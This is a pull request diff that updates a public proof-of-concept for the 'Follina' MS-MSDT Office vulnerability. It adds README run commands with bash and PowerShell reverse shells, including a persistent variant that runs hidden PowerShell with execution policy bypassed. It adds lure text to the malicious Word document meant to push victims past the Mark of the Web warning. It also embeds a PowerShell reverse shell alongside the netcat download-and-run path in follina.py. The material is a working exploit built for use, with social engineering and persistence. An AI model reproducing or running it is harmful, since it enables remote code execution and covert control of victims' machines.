### PR TITLE
Adding 2025 Support and Text to doc files

### DIFF
--- a/README.md
+++ b/README.md
@@ -1,4 +1,47 @@
-# MS-MSDT "Follina" Attack Vector
+# MS-MSDT "Follina" Attack Vector, Updated Version 2025
+
+## Edited/Added:
+
+- Fixed Options error in TCP Server log
+- Added Copy of doc file to Http Server for directly download payload
+- Added some Text to doc file for "maybe easy" bypassing Mark of the Web info banner
+- Some extra stuff in codebase
+
+
+## Run Script
+
+- Download Win10_21H2_English_x32.iso (Build 19044.1288)
+- Install/Run on Virtualbox or other VM
+- Download Office 32bit (ODT not working for me at this point)
+- `bitsadmin /TRANSFER O13DL /DOWNLOAD /PRIORITY high https://ia803209.us.archive.org/29/items/microsoft-office-2013-pro-plus-sp-1-english-32-bit_202005/Microsoft-Office-2013-Pro-Plus-SP1-English-32Bit.zip C:\office32.zip`
+- Unzip and run follina.py
+
+## Run
+
+```bash
+# Calc only
+python3 follina.py -i eth0 -p 8008
+```
+
+```bash
+# Multiple programs and MsgBox
+python3 follina.py -i enp0s3 -p 8008 -c 'calc ; winver ; Add-Type -AssemblyName "System.Windows.Forms"; [System.Windows.Forms.MessageBox]::Show("This is Follina PoC Edit by suuhm 2025", "Follina PoC", [System.Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Warning, [System.Windows.Forms.MessageBoxDefaultButton]::Button1, [System.Windows.Forms.MessageBoxOptions]::DefaultDesktopOnly) ; notepad'
+```
+
+```bash
+# Reverse LOLBIN shell
+nc -lnvp 5555
+python3 follina.py -i enp0s3 -p 8008 -c "export RHOST=<RHOST_IP>;export RPORT=5555;bash -c 'exec bash -i &>/dev/tcp/$RHOST/$RPORT <&1'"
+```
+
+---
+
+
+![grafik](https://github.com/user-attachments/assets/6adefab8-b657-4e98-bcd8-37d83db8387a)
+
+
+
+---
 
 > John Hammond | May 30, 2022
 

--- a/README.md
+++ b/README.md
@@ -5,12 +5,13 @@
 - Fixed Options error in TCP Server log
 - Added Copy of doc file to Http Server for directly download payload
 - Added some Text to doc file for "maybe easy" bypassing Mark of the Web info banner
+- Added new native PS Reverse Shell via `--reverse 5555` Parameter for bypassing nc problems
 - Some extra stuff in codebase
 
 
 ## Run Script
 
-- Download Win10_21H2_English_x32.iso (Build 19044.1288)
+- Download [Win10_21H2_English_x32.iso (Build 19044.1288)](https://archive.org/download/Win10_21H2_English_x32/Win10_21H2_English_x32.iso)
 - Install/Run on Virtualbox or other VM
 - Download Office 32bit (ODT not working for me at this point)
 - `bitsadmin /TRANSFER O13DL /DOWNLOAD /PRIORITY high https://ia803209.us.archive.org/29/items/microsoft-office-2013-pro-plus-sp-1-english-32-bit_202005/Microsoft-Office-2013-Pro-Plus-SP1-English-32Bit.zip C:\office32.zip`
@@ -22,15 +23,30 @@
 # Calc only
 python3 follina.py -i eth0 -p 8008
 ```
+---
 
 ```bash
 # Multiple programs and MsgBox
 python3 follina.py -i enp0s3 -p 8008 -c 'calc ; winver ; Add-Type -AssemblyName "System.Windows.Forms"; [System.Windows.Forms.MessageBox]::Show("This is Follina PoC Edit by suuhm 2025", "Follina PoC", [System.Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Warning, [System.Windows.Forms.MessageBoxDefaultButton]::Button1, [System.Windows.Forms.MessageBoxOptions]::DefaultDesktopOnly) ; notepad'
 ```
 
+## Reverse Shells
+
 ```bash
-# Reverse LOLBIN shell
-nc -lnvp 5555
+# New Alter-Native Reverse shell
+python3 follina.py -i enp0s3 -p 8008 -r 5555
+```
+
+--- 
+
+```bash
+ip a; nc -lnvp <WISHED_PORT> 
+
+# Using native Reverse LOLBIN shell
+python3 follina.py -i enp0s3 -p 8008 -c '$c=New-Object System.Net.Sockets.TCPClient("<REMOTE_IP_HOSTNAME>",<WISHED_PORT>);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length))-ne 0){$d=(New-Object System.Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex ". { $d } 2>&1"|Out-String)+"PS "+(pwd).Path+"> ";$sb=[text.encoding]::ASCII.GetBytes($r);$s.Write($sb,0,$sb.Length);$s.Flush()};$c.Close()'
+
+
+# For mysys/cygwin systems etc...
 python3 follina.py -i enp0s3 -p 8008 -c "export RHOST=<RHOST_IP>;export RPORT=5555;bash -c 'exec bash -i &>/dev/tcp/$RHOST/$RPORT <&1'"
 ```
 

--- a/README.md
+++ b/README.md
@@ -52,6 +52,16 @@ python3 follina.py -i enp0s3 -p 8008 -c "export RHOST=<RHOST_IP>;export RPORT=55
 
 ---
 
+### Persistent Reverse Shell
+#### Still open after closing parent word process
+
+```bash
+python3 follina.py -i enp0s3 -p 8001 -c 'cd $env:APPDATA;echo "`$c=New-Object System.Net.Sockets.TCPClient(`"<REMOTE_IP_HOSTNAME>`",5555);`$s=`$c.GetStream();[byte[]]`$b=0..65535|%{0};while((`$i=`$s.Read(`$b,0,`$b.Length))-ne 0){`$d=(New-Object System.Text.ASCIIEncoding).GetString(`$b,0,`$i);`$r=(iex `". { `$d } 2>&1`" | Out-String)+`"PS `"+(pwd).Path+`"> `";`$sb=[text.encoding]::ASCII.GetBytes(`$r);`$s.Write(`$sb,0,`$sb.Length);`$s.Flush()};`$c.Close()">t.ps1;Start powershell -WindowStyle Hidden -ArgumentList "-ep Bypass -f t.ps1"'
+```
+
+
+---
+
 
 ![grafik](https://github.com/user-attachments/assets/6adefab8-b657-4e98-bcd8-37d83db8387a)
 

--- a/doc/word/document.xml
+++ b/doc/word/document.xml
@@ -1,11 +1,50 @@
 <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
-<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex wp14"><w:body><w:object w:dxaOrig="4320" w:dyaOrig="4320" w14:anchorId="0457A93C"><v:shapetype id="_x0000_t75" 
-	coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" 
-	stroked="f"><v:stroke joinstyle="miter"/><v:formulas><v:f eqn="if lineDrawn pixelLineWidth 0"/>
-	<v:f eqn="sum @0 1 0"/><v:f eqn="sum 0 0 @1"/><v:f eqn="prod @2 1 2"/><v:f eqn="prod @3 21600 pixelWidth"/>
-	<v:f eqn="prod @3 21600 pixelHeight"/><v:f eqn="sum @0 0 1"/><v:f eqn="prod @6 1 2"/><v:f eqn="prod @7 21600 pixelWidth"/>
-	<v:f eqn="sum @8 21600 0"/><v:f eqn="prod @7 21600 pixelHeight"/><v:f eqn="sum @10 21600 0"/></v:formulas>
-	<v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/><o:lock v:ext="edit" aspectratio="t"/>
-	</v:shapetype><v:shape id="_x0000_i1025" type="#_x0000_t75" style="width:3.75pt;height:3.75pt" o:ole="">
-	</v:shape><o:OLEObject Type="Link" ProgID="htmlfile" ShapeID="_x0000_i1025" DrawAspect="Content" r:id="rId996" UpdateMode="OnCall">
-	<o:LinkType>EnhancedMetaFile</o:LinkType><o:LockedField>false</o:LockedField><o:FieldCodes>\f 0</o:FieldCodes></o:OLEObject></w:object><w:p w14:paraId="15AEA9D4" w14:textId="6B56B84E" w:rsidR="00DA49F2" w:rsidRPr="00EE2BC3" w:rsidRDefault="00DA49F2" w:rsidP="00EE2BC3"><w:bookmarkStart w:id="0" w:name="_GoBack"/><w:bookmarkEnd w:id="0"/></w:p><w:sectPr w:rsidR="00DA49F2" w:rsidRPr="00EE2BC3"><w:pgSz w:w="12240" w:h="15840"/><w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/><w:cols w:space="720"/><w:docGrid w:linePitch="360"/></w:sectPr></w:body></w:document>
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex wp14">
+  <w:body>
+    <w:object w:dxaOrig="4320" w:dyaOrig="4320" w14:anchorId="0457A93C">
+      <v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
+        <v:stroke joinstyle="miter"/>
+        <v:formulas>
+          <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+          <v:f eqn="sum @0 1 0"/>
+          <v:f eqn="sum 0 0 @1"/>
+          <v:f eqn="prod @2 1 2"/>
+          <v:f eqn="prod @3 21600 pixelWidth"/>
+          <v:f eqn="prod @3 21600 pixelHeight"/>
+          <v:f eqn="sum @0 0 1"/>
+          <v:f eqn="prod @6 1 2"/>
+          <v:f eqn="prod @7 21600 pixelWidth"/>
+          <v:f eqn="sum @8 21600 0"/>
+          <v:f eqn="prod @7 21600 pixelHeight"/>
+          <v:f eqn="sum @10 21600 0"/>
+        </v:formulas>
+        <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+        <o:lock v:ext="edit" aspectratio="t"/>
+      </v:shapetype>
+      <v:shape id="_x0000_i1025" type="#_x0000_t75" style="width:3.75pt;height:3.75pt" o:ole=""/>
+      <o:OLEObject Type="Link" ProgID="htmlfile" ShapeID="_x0000_i1025" DrawAspect="Content" r:id="rId996" UpdateMode="OnCall">
+        <o:LinkType>EnhancedMetaFile</o:LinkType>
+        <o:LockedField>false</o:LockedField>
+        <o:FieldCodes>\f 0</o:FieldCodes>
+      </o:OLEObject>
+    </w:object>
+    <w:p w14:paraId="15AEA9D4" w14:textId="6B56B84E" w:rsidR="00DA49F2" w:rsidRPr="00EE2BC3" w:rsidRDefault="00DA49F2" w:rsidP="00EE2BC3">
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+          <w:b/> <!-- BOLD -->
+        </w:rPr>
+        <w:t>For Full View Click on Enable Editing!</w:t>
+      </w:r>
+    </w:p>
+    <w:sectPr w:rsidR="00DA49F2" w:rsidRPr="00EE2BC3">
+      <w:pgSz w:w="12240" w:h="15840"/>
+      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
+      <w:cols w:space="720"/>
+      <w:docGrid w:linePitch="360"/>
+    </w:sectPr>
+  </w:body>
+</w:document>

--- a/follina.py
+++ b/follina.py
@@ -61,7 +61,7 @@ def main(args):
     # This is done so the maldoc knows what to reach out to.
 
     # >>> netifaces.ifaddresses("eth0")[netifaces.AF_INET][0]
-    # {'addr': '10.2.3.40', 'netmask': '255.255.255.0', 'broadcast': '10.2.3.255'}
+    # {'addr': '10.20.30.242', 'netmask': '255.255.255.0', 'broadcast': '10.20.30.255'}
 
     try:
         serve_host = ipaddress.IPv4Address(args.interface)
@@ -114,13 +114,13 @@ def main(args):
 
     command = args.command
     if args.reverse:
-        command = f"""Invoke-WebRequest https://github.com/JohnHammond/msdt-follina/blob/main/nc64.exe?raw=true                                                                                                                               -OutFile C:\\Windows\\Tasks\\nc.exe; C:\\Windows\\Tasks\\nc.exe -e cmd.exe {serve_host} {args.reverse}"""
+        command = f"""Invoke-WebRequest https://github.com/JohnHammond/msdt-follina/blob/main/nc64.exe?raw=true -OutFile C:\\Windows\\Tasks\\nc.exe; C:\\Windows\\Tasks\\nc.exe -e cmd.exe {serve_host} {args.reverse}"""
 
     # Base64 encode our command so whitespace is respected
     base64_payload = base64.b64encode(command.encode("utf-8")).decode("utf-8")
 
     # Slap together a unique MS-MSDT payload that is over 4096 bytes at minimum
-    html_payload = f"""<script>location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \\"IT_RebrowseForF                                                                                                                              ile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encodi                                                                                                                              ng]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'{base6                                                                                                                              4_payload}'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\\""; //                                                                                                                              """
+    html_payload = f"""<script>location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'{base64_payload}'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\\""; //"""
     html_payload += (
         "".join([random.choice(string.ascii_lowercase) for _ in range(4096)])
         + "\n</script>"
@@ -167,7 +167,7 @@ def main(args):
 
     # Host the HTTP server on all interfaces
     print(f"[+] serving html payload on :{args.port}")
-    print(f"\n Download file on: http://{serve_host}:{args.port}/{args.output}")
+    print(f"\n DOwnload file on: http://{serve_host}:{args.port}/{args.output}")
     if args.reverse:
         t = threading.Thread(target=serve_http, args=())
         t.start()

--- a/follina.py
+++ b/follina.py
@@ -114,7 +114,12 @@ def main(args):
 
     command = args.command
     if args.reverse:
-        command = f"""Invoke-WebRequest https://github.com/JohnHammond/msdt-follina/blob/main/nc64.exe?raw=true -OutFile C:\\Windows\\Tasks\\nc.exe; C:\\Windows\\Tasks\\nc.exe -e cmd.exe {serve_host} {args.reverse}"""
+        if args.reverse == 5555:
+            # Starting alter-native PS ReverseShell: 
+            # Fixed the nc not compatible with Win 32bit problem
+            command = f'''$c=New-Object System.Net.Sockets.TCPClient("{serve_host}",{args.reverse});$s=$c.GetStream();[byte[]]$b=0..65535|%{{0}};while(($i=$s.Read($b,0,$b.Length))-ne 0){{$d=(New-Object System.Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex ". {{ $d }} 2>&1"|Out-String)+"PS "+(pwd).Path+"> ";$sb=[text.encoding]::ASCII.GetBytes($r);$s.Write($sb,0,$sb.Length);$s.Flush()}};$c.Close()'''
+        else:
+            command = f"""Invoke-WebRequest https://github.com/JohnHammond/msdt-follina/blob/main/nc64.exe?raw=true -OutFile C:\\Windows\\Tasks\\nc.exe; C:\\Windows\\Tasks\\nc.exe -e cmd.exe {serve_host} {args.reverse}"""
 
     # Base64 encode our command so whitespace is respected
     base64_payload = base64.b64encode(command.encode("utf-8")).decode("utf-8")


### PR DESCRIPTION
## Edited/Added:

- Fixed Options error in TCP Server log
- Added Copy of doc file to Http Server for directly download payload
- Added some Text to doc file for "maybe easy" bypassing Mark of the Web info banner
- Added new native PS Reverse Shell via --reverse 5555 Parameter for bypassing nc problems

More for exactly running PoC 2025 on:

https://github.com/suuhm/msdt-follina-poc-2025